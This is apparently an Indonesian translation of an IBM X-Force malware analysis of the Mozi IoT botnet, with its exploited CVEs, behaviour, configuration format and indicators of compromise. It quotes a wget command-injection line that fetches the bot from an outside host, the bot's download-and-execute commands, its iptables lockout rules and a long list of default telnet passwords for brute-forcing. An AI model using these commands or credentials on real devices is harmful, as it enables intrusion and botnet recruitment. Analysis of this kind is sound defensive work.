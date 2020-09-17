Keamanan

Serangan botnet baru saja masuk ke kota

Programmer wanita berkonsentrasi saat bekerja di komputer di meja di kantor

Penulis

Dave McMillen

Senior Threat Researcher

IBM X-Force

Wei Gao

Malware Reverse Engineer

Charles DeBeck

Senior Cyber Threat Intelligence Analyst - IBM

Pemain yang relatif baru di arena ancaman, botnet Mozi, telah melonjak di antara perangkat Internet of Things (IoT), IBM®X-Force telah menemukan.

Malware ini telah aktif sejak akhir 2019 dan memiliki kode yang tumpang tindih dengan Mirai dan variannya. Mozi menyumbang hampir 90% dari lalu lintas jaringan IoT yang diamati dari Oktober 2019 hingga Juni 2020.

Pengambilalihan mengejutkan ini disertai dengan peningkatan besar dalam aktivitas botnet IoT secara keseluruhan, menunjukkan Mozi tidak menghapus pesaing dari pasar. Sebaliknya, itu membanjiri pasar, mengerdilkan aktivitas varian lain. Secara keseluruhan, gabungan contoh serangan IoT dari Oktober 2019, ketika serangan mulai meningkat secara signifikan, hingga Juni 2020 adalah 400% lebih tinggi daripada contoh serangan IoT gabungan selama dua tahun sebelumnya.

Grafik Volume Serangan IoT dari Juni 2018 hingga Mei 2020

Lonjakan serangan IoT ini bisa disebabkan oleh sejumlah penyebab, tetapi sebagian mungkin disebabkan oleh lingkungan IoT yang terus berkembang untuk ditargetkan oleh aktor ancaman. Ada sekitar 31 miliar perangkat IoT yang diterapkan di seluruh dunia, dan tingkat penerapan IoT sekarang 127 perangkat per detik.

Penyerang telah memanfaatkan perangkat ini untuk beberapa waktu sekarang, terutama melalui botnet Mirai. Tim IBM® X-Force Incident Response and Intelligence Services (IRIS) telah mengikutinya selama hampir empat tahun. Jadi mengapa terjadi lonjakan tiba-tiba? Penelitian IBM® menunjukkan Mozi terus Lanjutkan sebagian besar melalui penggunaan serangan injeksi perintah (CMDi), yang sering kali Hasil dari kesalahan konfigurasi perangkat IoT. Pertumbuhan penggunaan IoT yang berkelanjutan dan protokol konfigurasi yang buruk adalah kemungkinan penyebab di balik lompatan ini. Peningkatan ini mungkin telah didorong lebih lanjut oleh jaringan perusahaan yang lebih sering diakses dari jarak jauh karena COVID 19.

Perangkat IoT Ada di Mana-Mana

Botnet IoT dapat digunakan untuk melakukan serangan denial-of-service terdistribusi (DDoS), mencuri data, dan mengirim spam. Ada sejumlah besar jenis perangkat IoT untuk mengeksploitasi:

  • IoT Konsumen: Perangkat berbasis rumah, seperti kamera keamanan, kontrol pencahayaan, peralatan, dll.
  • IoT Komersional: Perangkat yang dirancang untuk digunakan di berbagai industri. Misalnya, perawatan kesehatan memiliki Pacemaker dan monitor yang terhubung ke internet. Industri transportasi dan konstruksi menggunakan perangkat yang berkaitan dengan pelacak kendaraan, telematika, sistem logistik dan rantai pasokan, serta building information modeling.
  • Enterprise IoT: Perangkat yang dirancang untuk digunakan di kantor, seperti proyektor, router, sistem keamanan, dan iklan digital.
  • IoT Industri: Sistem kontrol industri, sistem otomatisasi lini produksi, pengontrol logika, dan sistem pesawat terbang.
  • Infrastruktur IoT: Sistem manajemen kota pintar, perangkat kontrol lalu lintas, perangkat pemantauan utilitas, dll.
  • Internet of Military Things: Perangkat biometrik tempur wearable, robot, dan peralatan.

Permukaan serangan besar ini membuat organisasi rentan terhadap botnet IoT. Ditambah lagi dengan celah keamanan yang sering kali dimiliki perangkat tersebut sejak awal dan praktik pengamanan yang longgar saat penerapan. Kerentanan yang paling menonjol dalam IoT datang melalui serangan CMDi.

Serangan CMDi Menyebabkan Botnet Mozi

Hampir semua penargetan IoT yang diamati IBM® mencoba menggunakan serangan CMDi untuk mendapatkan akses awal ke perangkat. Jika titik akhir yang ditargetkan adalah perangkat IoT dan rentan terhadap serangan ini, muatan diunduh dan dieksekusi.

Serangan CMDi sangat populer terhadap perangkat IoT karena beberapa alasan. Pertama, sistem tertanam IoT biasanya berisi antarmuka web dan antarmuka debugging yang tersisa dari pengembangan firmware yang dapat dieksploitasi. Kedua, modul PHP yang dibangun ke dalam antarmuka web IoT dapat dieksploitasi untuk memberikan kemampuan eksekusi jarak jauh kepada aktor jahat. Dan ketiga, antarmuka IoT sering dibiarkan rentan saat diterapkan karena administrator gagal mengeraskan antarmuka dengan membersihkan input yang diharapkan. Hal ini memungkinkan aktor ancaman untuk input perintah shell seperti “wget”.

Analisis kami mengungkapkan botnet Mozi memanfaatkan CMDi dengan menggunakan perintah shell “wget”, kemudian mengubah izin untuk memungkinkan aktor ancaman berinteraksi dengan sistem yang terpengaruh. Sebagai contoh:

wget http://xxx.xx.xxx.xxx/bins/mozi.a -o /var/tmp/mozi.a; chmod 777 /var/tmp/mozi.a; rm -rf /var/tmp/mozi.a

Jika host rentan terhadap CMDi, perintah ini akan mengunduh dan mengeksekusi file bernama “mozi.a.” Analisis kami terhadap sampel khusus ini menunjukkan file dieksekusi pada mikroprosesor tanpa arsitektur tahapan pipa yang saling terkait (MIPS). Ini adalah ekstensi yang dipahami oleh mesin yang menjalankan arsitektur computer set instruksi berkurang (RISC), yang lazim pada banyak perangkat IoT. Setelah penyerang mendapatkan akses penuh ke perangkat melalui botnet, level firmware dapat diubah dan malware tambahan dapat ditanam di perangkat.

Meskipun contoh ini mengutip vektor yang terkenal, itu dapat terus efektif karena dua alasan utama. Pertama, kerentanan baru memungkinkan pembaruan terus-menerus dari upaya eksploitasi melalui CMDi, dan implementasi patch yang lambat dapat dieksploitasi. Kedua, aktivitas ini mudah diotomatisasi, memungkinkan aktor ancaman untuk menyerang sejumlah besar perangkat dengan cepat dengan biaya rendah.

Infrastruktur botnet Mozi tampaknya terutama bersumber di Tiongkok, menyumbang 84% dari infrastruktur yang diamati. Fakta ini sejalan dengan riset sumber terbuka lainnya tentang aktivitas IoT pada tahun 2020.

Di bawah ini adalah daftar kerentanan yang telah diamati IBM® oleh botnet Mozi yang mencoba untuk mengeksploitasi:

KerentananPerangkat yang Terpengaruh
CVE-2017-17215Huawei HG532
CVE-2018-10561/CVE-2018-10562Router GPON
CVE-2014-8361Perangkat yang menggunakan Realtek SDK
Router Nirkabel Eir D1000 RCIRouter Nirkabel Eir D1000
CVE-2008-4873Sepal SPBOARD
CVE-2016-6277Netgear R7000/R6400
Netgear setup.cgi RCE tidak diautentikasiNetgear DGN1000
Eksekusi Perintah MVPower DVRMVPower DVR TV-7104HE
CVE-2015-2051Perangkat D-Link
Eksekusi Perintah D-Link UPnP SOAPPerangkat D-Link
Vendor CCTV-DVR RCEBeberapa Vendor CCTV-DVR
Analisis Teknis Mozi Botnet

Botnet Mozi adalah botnet peer-to-peer (P2P) berdasarkan protokol sloppy hash table (DSHT) terdistribusi, yang dapat menyebar melalui eksploitasi perangkat IoT dan kata sandi telnet yang lemah.

Setelah dieksekusi, botnet Mozi mencoba mengikat port UDP lokal 14737. Sampel membaca /proc/net/tcp atau /proc/net/raw untuk menemukan dan membunuh proses yang menggunakan port 1536 dan 5888. Sampel memeriksa apakah file /usr/bin/python ada. Jika ada, sampel mengubah nama prosesnya menjadi sshd. Jika tidak, sampel mengubahnya menjadi dropbear.

Botnet Mozi diketahui memiliki setidaknya dua karakteristik unik. Ini menggunakan ECDSA384 (algoritma tanda tangan digital kurva eliptik 384) untuk memverifikasi integritasnya. Selain itu, ia menggunakan kembali bagian dari kode Gafgyt.

Ini berisi node publik DHT hardcode, yang dapat digunakan untuk bergabung dengan jaringan P2P. Node ini adalah:

dht[.]transmisibt[.]com:6881
router[.]bittorrent[.]com:6881
router[.]utorrent[.]com:6881
bttracker[.]debian[.]org:6881
212[.]129[.]33[.]59:6881
82[.]221[.]103[.]244:6881
130[.]239[.]18[.]159:6881
87[.]98[.]162[.]88:6881

Botnet Mozi berisi empat kemampuan utama. Ini dapat melakukan serangan DDoS (HTTP, TCP, UDP); melakukan serangan eksekusi perintah; mengunduh payload berbahaya dari URL tertentu dan menjalankannya; dan mengumpulkan informasi bot.

Daftar File

Tabel di bawah ini berisi detail tingkat tinggi tentang file yang dianalisis. Perinciannya mencakup file yang dikirim dan file sisa. (File sisa adalah file yang diekstraksi secara statis atau dinamis selama analisis malware.) Data termasuk nama file, kategori file yang ditentukan oleh analisis, hash file dan keturunan file dalam kaitannya dengan file lain dalam tabel.

Nama FileKategori FileFile HashParent
mozi.mBotnet4dde761681684d7edad4e5e1ffdb940bN/A
5738f1bc69e78d234dd04e2fbfcfb4b86403fc9117b133cf1bb7cda67e7aef0aBotnet86d42d968d3d12c36722e16c78e49ffbmozi.m
mozi.aBotnet9a111588a7db15b796421bd13a949cd4N/A
83441d77abb6cf328e77e372dc17c607fb9c4a261722ae80d83708ae3865053dBotnetdd4b6f3216709e193ed9f06c37bcc3890mozi.a

Analisis Perilaku Botnet Mozi

Setelah dieksekusi, sampel mencoba mengikat port UDP lokal 14737. Sampel membaca /proc/net/tcp atau /proc/net/raw untuk menemukan dan membunuh proses yang menggunakan port 1536 dan 5888. Sampel memeriksa apakah file /usr/bin/python ada. Jika ada, sampel mengubah nama prosesnya menjadi sshd. Jika tidak, sampel mengubahnya menjadi dropbear:

Sampel memeriksa apakah file /usr/bin/python ada. Jika ada, sampel mengubah nama prosesnya menjadi sshd. Jika tidak, sampel mengubahnya menjadi dropbear

Sampel juga mencoba memperbarui daftar kontrol akses untuk memblokir SSH dan telnet untuk mencegah botnet lain menggunakannya.

iptables -I INPUT  -p tcp –destination-port 22 -j DROP
iptables -I INPUT  -p tcp –destination-port 23 -j DROP
iptables -I INPUT  -p tcp –destination-port 2323 -j DROP
iptables -I OUTPUT -p tcp –source-port 22 -j DROP
iptables -I OUTPUT -p tcp –source-port 23 -j DROP
iptables -I OUTPUT -p tcp –source-port 2323 -j DROP

Ini juga secara acak memilih port hardcode di iptable:

Tangkapan layar dibuat untuk postingan blog

DHT

Botnet Mozi menggunakan protokol DHT yang disesuaikan untuk mengembangkan jaringan P2P-nya. Proses bagaimana node Mozi baru bergabung dengan jaringan DHT adalah sebagai berikut:

  • Node Mozi baru akan mengirim permintaan HTTP awal ke ttp[:]//ia[.]51[.]la untuk mendaftarkan dirinya sendiri.
  • Node Mozi baru mengirimkan kueri DHT find_node ke delapan node publik DHT hardcode dan menghubungkan node ini untuk bergabung dengan jaringan. Find node digunakan untuk menemukan informasi kontak untuk node yang diberi ID-nya. Delapan node publik DHT hardcode ini adalah sebagai berikut:
dht[.]transmisibt[.]com:6881
router[.]bittorrent[.]com:6881
router[.]utorrent[.]com:6881
bttracker[.]debian[.]org:6881
212[.]129[.]33[.]59:6881
82[.]221[.]103[.]244:6881
130[.]239[.]18[.]159:6881
87[.]98[.]162[.]88:6881

Sampel perlu menghasilkan ID untuk node saat ini. Menurut laporan 360 Netlab tentang Mozi, “ID adalah 20 byte dan terdiri dari awalan 888888 yang disematkan dalam sampel atau awalan yang ditentukan oleh file konfigurasi [hp], ditambah string yang dihasilkan secara acak.” File konfigurasi ditunjukkan di bawah ini:.

[ss]bot[/ss][hp]88888888[/hp][count]http[:]//ia[.]51[.]la/go1?id=19894027&pu=http%3a%2f%2fbaidu.com/[idp][/count]

Untuk bergabung dengan jaringan DHT, sampel mengirimkan kueri ping ke node publik DHT hardcode ini. Kueri ping dengan ID node ditampilkan dalam lalu lintas pada gambar Wireshark di bawah ini

Kueri ping dengan ID node ditampilkan dalam lalu lintas di Wireshark

Analisis statis

Kedua sampel dikemas dengan menggunakan packer UPX yang disesuaikan. Proses ini menghapus nilai p_file_size dan p_blocksize menjadi nol dalam struktur p_info.

File Konfigurasi

Sampel berisi file konfigurasi hardcode yang ditunjukkan di bawah ini:

Sampel yang berisi file konfigurasi hardcode

File ini berisi empat bagian:

  • Biru: data konfigurasi (428 byte)
  • Hijau: ECDSA384 signature 1 (96 byte)
  • Merah: Versi konfigurasi (4 byte)
  • Hitam: ECDSA384 signature 2 (96 byte)

Data konfigurasi dikodekan menggunakan kunci XOR hardcode, 4E665A8F80C8AC238DAC4706D54F6F7E. Data konfigurasi yang didekodekan ditunjukkan di bawah ini:

[ss]bot[/ss][hp]88888888[/hp][count]http[:]//ia[.]51[.]la/go1?id=19894027&pu=http%3a%2f%2fbaidu.com/[idp][/count]

Data konfigurasi mendukung beberapa perintah yang ditandai sebagai berikut:

Tag (Perintah)Deskripsi
[ss]Peran bot
[ssx]mengaktifkan/menonaktifkan tag [ss]
[cpu]Arsitektur CPU
[cpux]mengaktifkan/menonaktifkan tag [cpu]
[nd]node DHT baru
[hp]Awalan hash node DHT
[atk]Jenis serangan DDoS
[ver]Nilai di bagian V di DHT protcol
[sv]Perbarui konfigurasi
[ud]Perbarui bot
[dr]Unduh dan jalankan payload dari URL yang ditentukan
[rn]Jalankan perintah yang ditentukan
[dip]ip:port untuk mengunduh bot Mozi
[idp]laporkan bot
[count]URL yang digunakan untuk melaporkan bot

Botnet Mozi menggunakan kembali bagian dari kode Gafgyt dalam serangan DDoS. Ini mendukung beberapa jenis serangan DDoS seperti HTTP, TCP, dan UDP.

ECDSA384 signature 1 digunakan untuk memverifikasi nilai hash data konfigurasi. Kunci publik hardcode yang digunakan untuk memverifikasinya adalah:

4C A6 FB CC F8 9B 12 1F 49 64 4D 2F 3C 17 D0 B8 
E9 7D 24 24 F2 DD B1 47 E9 34 D2 C2 BF 07 AC 53 
22 5F D8 92 FE ED 5F A3 C9 5B 6A 16 BE 84 40 77 
88

Ini dikodekan dengan kunci XOR 4E665A8F80C8AC238DAC4706D54F6F7E. Kunci publik yang didekodekan adalah:

02 c0 a1 43 78 53 be 3c c4 c8 0a 29 e9 58 bf c6 
a7 1b 7e ab 72 15 1d 64 64 98 95 c4 6a 48 c3 2d 
6c 39 82 1d 7e 25 f3 80 44 f7 2d 10 6b cb 2f 09 
c6

Versi konfigurasi menentukan kapan harus memperbarui bot. Ini akan memperbarui bot ketika nilai ini lebih besar dari nilainya saat ini. ECDSA384 tanda tangan 2 digunakan untuk memverifikasi tiga bagian pertama dari file konfigurasi ini. Kunci publik hardcode yang digunakan untuk memverifikasinya adalah:

4C B3 8F 68 C1 26 70 EB 9D C1 68 4E D8 4B 7D 5F 
69 5F 9D CA 8D E2 7D 63 FF AD 96 8D 18 8B 79 1B 
38 31 9B 12 69 73 A9 2E B6 63 29 76 AC 2F 9E 94 
A1

Ini dikodekan dengan kunci XOR 4E665A8F80C8AC238DAC4706D54F6F7E. Kunci publik yang didekodekan adalah:

02 D5 D5 E7 41 EE DC C8 10 6D 2F 48 0D 04 12 21 
27 39 C7 45 0D 2A D1 40 72 01 D1 8B CD C4 16 65 
76 57 C1 9d E9 BB 05 0D 3B CF 6E 70 79 60 F1 EA 
Ef

Pencacahan Login Telnet

Selain kerentanan yang dieksploitasi botnet Mozi untuk mendapatkan akses ke perangkat korban, botnet Mozi juga dapat menggunakan kredensial telnet paksa menggunakan daftar kredensial hardcode:

root
admin
CUAdmin
default
rapport
super
telnetadmin
!!Huawei
keomeo
support
CMCCAdmin
e8telnet
e8ehome1
e8ehome
user
mother
Administrator
service
supervisor
guest
admin1
administrator
666666
888888
ubnt
tech
xc3511
vizxv
Pon521
e2008jl
r@p8p0r+
GM8182
gpon
Zte521
hg2x0
epicrouter
conexant
xJ4pCYeW
v2mprt
PhrQjGzk
h@32LuyD
gw1admin
adminpass
xmhdipc
juantech
@HuaweiHgw
adminHW
2010vesta
2011vesta
plumeria0077
cat1029
123456
54321
hi3518
password
12345
fucker
pass
admin1234
1111
smcadmin
1234
klv123
klv1234
zte
jvbzd
anko
zlxx
7ujMko0vizxv
7ujMko0admin
system
ikwb
dreambox
realtek
00000000
1111111
meinsm

Satu kekuatan brute force login telnet yang digunakan oleh sampel sebagai berikut:

Satu login telnet dengan kekerasan

Indikator

Mozi.m dan Mozi.a

Jaringan

dht[.]transmisibt[.]com:6881
router[.]bittorrent[.]com:6881
router[.]utorrent[.]com:6881
bttracker[.]debian[.]org:6881
212[.]129[.]33[.]59:6881
82[.]221[.]103[.]244:6881
130[.]239[.]18[.]159:6881
87[.]98[.]162[.]88:6881

String Terkenal (tidak dikemas)

8.8.8.8
/proc/net/route
Mozilla/4.0 (Kompatibel; MSIE 8.0; Windows NT 5.2; Trident/6.0)
Mozilla/4.0 (kompatibel; MSIE 10.0; Windows NT 6.1; Trident/5.0)
Mozilla/4.0 (kompatibel; MSIE 8.0; Windows NT 5.1; pl) Opera 11.00
Mozilla/4.0 (kompatibel; MSIE 8.0; Windows NT 6.0; en) Opera 11.00
Mozilla/4.0 (kompatibel; MSIE 8.0; Windows NT 6.0; ya) Opera 11.00
Mozilla/4.0 (kompatibel; MSIE 8.0; Windows NT 6.1; de) Opera 11.01
Mozilla/4.0 (kompatibel; MSIE 8.0; Windows NT 6.1; fr) Opera 11.00
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, seperti Gecko) Chrome/50.0.2661.102 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, seperti Gecko) Chrome/51.0.2704.79 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
 Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 seperti Mac OS X) AppleWebKit/600.1.4 (KHTML, seperti Gecko) Versi/8.0 Mobile/12H143 Safari/600.1.4
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0
 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, seperti Gecko) Chrome/45.0.2454.101 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, seperti Gecko) Chrome/46.0.2490.80 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.56 (KHTML, seperti Gecko) Versi/9.0 Safari/601.1.56
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, seperti Gecko) Versi/9.0.1 Safari/601.2.7
Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) seperti tokek
Mozilla/4.0 (kompatibel; MSIE 6.1; Windows XP)
Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22/10.51
Opera/9.80 (X11; Linux i686; Ubuntu/14.10) Presto/2.12.388 Versi/12.16
 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, seperti Gecko) Versi/7.0.3 Safari/7046A194A
Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, seperti Gecko) Chrome/50.0.2661.102 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, seperti Gecko) Chrome/50.0.2661.94 Safari/537.36
Mozilla/5.0 (Linux; Android 4.4.3) AppleWebKit/537.36 (KHTML, seperti Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36
Mozilla/5.0 (Linux; Android 4.4.3; HTC_0PCV2 build/KTU84L) AppleWebKit/537.36 (KHTML, seperti Gecko) Versi/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
Mozilla/4.0 (kompatibel; MSIE 8.0; X11; Linux x86_64; pl) Opera 11.00
Mozilla/4.0 (kompatibel; MSIE 9.0; Windows 98; .NET CLR 3.0.04506.30)
Mozilla/4.0 (kompatibel; MSIE 9.0; Windows NT 5.1; Trident/5.0)
Mozilla/4.0 (kompatibel; MSIE 9.0; Windows NT 6.0; Trident/4.0; GTB7.4; InfoPath.3; SV1; .NET CLR 3.4.53360; WOW64; en-AS)
Mozilla/4.0 (kompatibel; MSIE 9.0; Windows NT 6.1; Trident/4.0; FDM; MSIeCrawler; Pusat Media PC 5.0)
Mozilla/4.0 (kompatibel; MSIE 9.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 4.4.58799; WOW64; en-AS)
Mozilla/4.0 (kompatibel; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts)
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0
 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0) Gecko/20100101 Firefox/21.0
 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:24.0) Gecko/20100101 Firefox/24.0
 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0
DAPATKAN
KEPALA
POSTING
. /konfigurasi
/tmp/config
cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL “http://127.0.0.1″>http://127.0.0.1”
cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword “acsMozi”
iptables -I INPUT  -p tcp –destination-port 35000 -j DROP
iptables -I INPUT  -p tcp –destination-port 50023 -j DROP
iptables -I OUTPUT -p tcp –source-port 50023 -j DROP
iptables -I OUTPUT -p tcp –source-port 35000 -j DROP
iptables -I INPUT  -p tcp –destination-port 7547 -j DROP
iptables -I OUTPUT -p tcp –source-port 7547 -j DROP
[cpux]
[/cpux]
[cpu]
[/cpu]
[ssx]
[/ssx]
[ss]
[/ss]
none
[sv]
[/sv]
[rn]
[/rn]
run:
[nd]
[/nd]
/tmp
/var
/temp
iptables -I INPUT  -p udp –destination-port %d -j ACCEPT
iptables -I OUTPUT -p udp –source-port %d -j ACCEPT
iptables -I PREROUTING  -t nat -p udp –destination-port %d -j ACCEPT
iptables -I POSTROUTING -t nat -p udp –source-port %d -j ACCEPT
0.0.0.0
[idp]
This node doesn’t accept announces
dht.transmissionbt.com:6881
router.bittorrent.com:6881
router.utorrent.com:6881
bttracker.debian.org:6881
212.129.33.59:6881
82.221.103.244:6881
130.239.18.159:6881
 87.98.162.88:6881

Kesimpulan

Lingkungan botnet IoT terus bergeser, dan data IBM® menunjukkan aktor ancaman tetap aktif di ruang ini. Karena kelompok botnet baru, seperti Mozi, meningkatkan operasi dan aktivitas IoT secara keseluruhan melonjak, organisasi yang menggunakan perangkat IoT perlu menyadari ancaman yang berkembang. IBM® semakin melihat perangkat IoT perusahaan di bawah kecaman dari penyerang. Injeksi perintah tetap menjadi vektor infeksi utama yang dipilih oleh aktor ancaman, menegaskan kembali betapa pentingnya mengubah pengaturan default perangkat serta menggunakan pengujian penetrasi yang efektif untuk menemukan dan memperbaiki celah pertahanan.

Atribut File

Metadata Mozi.m

Nama file:Mozi.m
Ukuran File:108.808
MD5:4dde761681684d7edad4e5e1ffdb940b
SHA1:2327be693bc11a618c380d7d3abc2382d870d48b
SHA256:d546509ab6670f9ff31783ed72875dfc0f37fa2b666bd5870eecaaed2ebea4a8
Jenis File:ELF 32-bit MSB dapat dieksekusi, MIPS, MIPS-I versi 1 (SYSV), terhubung secara statis, dilucuti
Kategori:Botnet
Nama IRIS:Mozi
Nama lain:

Metadata Mozi.a

Nama file:Mozi.a
Ukuran File:95.268
MD5:9a111588a7db15b796421bd13a949cd4
SHA1:034c8c51a58be11ca620ce3eb0d43d5a59275d2f
SHA256:e15e93db3ce3a8a22adb4b18e0e37b93f39c495e4a97008f9b1a9a42e1fac2b0
Jenis File:ELF 32-bit LSB dapat dieksekusi, ARM, versi 1, ditautkan secara statis, dilucuti
Kategori:Botnet
Nama IRIS:Mozi
Nama lain: 

5738f1bc69e78d234dd04e2fbfcfb4b86403fc9117b133cf1bb7cda67e7aef0a Metadata

Nama file:d546_dibongkar
Ukuran File:266.108
MD5:86d42d968d3d12c36722e16c78e49ffb
SHA1:ba733ab3bfc6b4afcf784f95aa9bee99fb665a71
SHA256:5738f1bc69e78d234dd04e2fbfcfb4b86403fc9117b133cf1bb7cda67e7aef0a
Jenis File:ELF 32-bit MSB dapat dieksekusi, MIPS, MIPS-I versi 1 (SYSV), terhubung secara statis, dilucuti
Kategori:Botnet
Nama IRIS:Mozi
Nama lain: 

83441d77abb6cf328e77e372dc17c607fb9c4a261722ae80d83708ae3865053d Metadata

Nama file:83441d77abb6cf328e77e372dc17c607fb9c4a261722ae80d83708ae3865053d
Ukuran File:212.464
MD5:DD4B6F3216709E193ED9F06C37BCC389
SHA1:758ba1ab22dd37f0f9d6fd09419bfef44f810345
SHA256:83441d77abb6cf328e77e372dc17c607fb9c4a261722ae80d83708ae3865053d
Jenis File:b'elf 32-bit LSB dapat dieksekusi, ARM, versi 1, ditautkan secara statis, dilucuti’
Kategori:Botnet
Nama IRIS:Mozi
Nama lain: 